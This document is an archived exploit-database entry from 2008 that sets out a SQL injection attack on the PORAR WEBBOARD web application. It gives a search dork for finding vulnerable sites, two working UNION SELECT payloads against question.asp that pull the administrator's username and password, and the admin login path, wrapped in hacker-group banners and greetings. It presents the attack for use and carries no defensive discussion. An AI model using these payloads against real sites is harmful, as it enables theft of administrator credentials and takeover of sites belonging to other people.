exploit-db-mirror/exploits/asp/webapps/5185.txt

  ##     ##
   ##   ##
    ## ##
     ###CoRPITX
     ###
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
#            PORAR WEBBOARD SQL Injection Vulnerability
#
#######################################################################
#
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
#  email  : xcorpitx@hotmail.com
#
########################################################################
#  This (SQL) give  Admin name and Admin password
#  Bu sorgu direk admin ismi ve  sisresini verecektir
########################################################################
#
#  DorK   : '' webboard question.asp QID''
#
########################################################################
#
#  EXPLOIT:
#
########################################################################
# example 1  : columns number 10
#
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# some tÃ½mes thÃ½s sql
# example 2 : columns number 11
#
question.asp?QID=-1%20+%20union%20+%20select%20+%200,1,2,username,4,5,password,7,8,9,10,11%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# admin login
#
http://www.xxx.com/webboard/admin/login.asp
#
########################################################################

Thanx : str0ke,D3ng3s!z,Pc faresi,Hayalet,Turque,SmoKin,Apex,Mostbiq

have nice day and hack

i m sory jane  :(


Kankilerim   D3ng3s!z ve Pc faresi ne sevgiler  el sallayin :S

# milw0rm.com [2008-02-25]